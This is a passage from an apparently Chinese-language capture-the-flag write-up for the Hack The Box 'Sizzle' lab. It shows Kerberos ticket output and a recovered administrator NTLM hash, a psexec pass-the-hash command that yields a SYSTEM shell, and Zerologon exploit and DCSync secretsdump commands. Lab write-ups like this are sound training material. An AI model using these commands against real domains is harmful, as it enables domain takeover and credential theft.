cCai81YXG5egRhrHNTB8slv8z3Ssd6hggkdGtlL2pZXdsHIZUfnm3F8pDP/4fDIfjrhK/12mU3Nuned2
BEj1b1IViA8/ZhA16xI31WoWvvLIDi1YIKkwjUar7Et4lTYIRLw7ipZP9U8LcqTY31zudMNtndbFHipr
2ruS9q/1N06IzB3WLYPnsuOV2NKeQeHHZCg5WDDqKXGPjU7dOt79xXLPsRrTOU3FNpVezZcH/G9nhgXP
QfV2VP9GxqGuvlGxiC6sTS+iGZ7QTbWWK+EC5SyLNlhwN0pukxOVRNwFESk2DrTZqVjwX9fNMW5TnNms
TTCjndjl4OVoOrm7AOsbgNQfB5lb/1KDa/ruVEjF1Aj/1yHegjEwZJ0xJgDKNYyejkfl4gjKRIX67HnR
pIfTEbTGW7DYR7nNa72fgiSdaDxRXMUNFhcbKPtLaA6nIAY7FVQ2jp5RJE/O1GkulRw/URvjV/U0gUh0
dE+/ea+vatXVJMzct5LVcnNu1i5K4TLzRKoAEDlAB5Yf1IXhrXhFXPMaqbNTfC86qAJgMnokyr16ChY5
Xf86J2dw6IqurhoobfibJDkcXJJwk/Hqdoa3X8zHa7xPSDAdqEQ3GPX85WFP6Be/vuDj4LHDmcZL16tj
MkXKFOmnK3/PvkHyJ5n7slL1R7ol6j4XayjLhdBvDDRbUl+iWnpH1UckkoKcGPyf9t9Z4GTy81YkoZJY
k0ynu6aWtcZomRt6MTxFxOPY+w2EFfaosrYW1f8eD4VrQ6STeabIp3g1zNEp/jKPrSV4c0slZJ0AWBhv
0W/STwJJsfKFMUj7X32yQpaoSCih3+ZtIvTaD15DH9EeItx3suw/NXYzBhESG6rS2yaU97j0ILU1o4HS
MIHPoAMCAQCigccEgcR9gcEwgb6ggbswgbgwgbWgGzAZoAMCARehEgQQnWXDusmX1zaSL+l35K+ALaEL
GwlIVEIuTE9DQUyiGjAYoAMCAQGhETAPGw1hZG1pbmlzdHJhdG9yowcDBQBA4QAApREYDzIwMjYwMzE5
MTMzOTA0WqYRGA8yMDI2MDMxOTIzMzkwNFqnERgPMjAyNjAzMjYxMzM5MDRaqAsbCUhUQi5MT0NBTKke
MBygAwIBAqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fs
ServiceName : krbtgt/htb.local
ServiceRealm : HTB.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : HTB.LOCAL
StartTime : 3/19/2026 9:39:04 AM
EndTime : 3/19/2026 7:39:04 PM
RenewTill : 3/26/2026 9:39:04 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : nWXDusmX1zaSL+l35K+ALQ==
ASREP (key) : A4A16318248D92616279308194135CE1
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : F6B7160BFC91823792E0AC3A162C9267
--------------------------------------
[+] okkk! NTLM Hash。
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:02.98
通过 ADCS 模板注入获得的 PFX 文件成功请求到了 Kerberos 票据和 NTLM 哈希。
获得 system 权限
使用 NTLM 直接登录:
$ psexec.py -hashes ':F6B7160BFC91823792E0AC3A162C9267' htb.local/administrator@htb.local
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on htb.local.....
[*] Found writable share ADMIN$
[*] Uploading file jfcQLsrd.exe
[*] Opening SVCManager on htb.local.....
[*] Creating service pzJM on htb.local.....
[*] Starting service pzJM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
由此,从第一个立足点直接拿到了 system 权限。现在可以直接拿两个 Flag 了。
番外
还有一种非预期路径。通过 CVE-2020-1472 将机器账户的密码重置为空,就可以 DCSync 了。
识别:
$ sudo nxc smb htb.local -u '' -p '' -M zerologon
攻击:
$ sudo python3 cve-2020-1472-exploit.py SIZZLE 10.129.6.66
$ sudo impacket-secretsdump -no-pass -just-dc htb.local/SIZZLE\$@10.129.6.66
浙公网安备 33010602011771号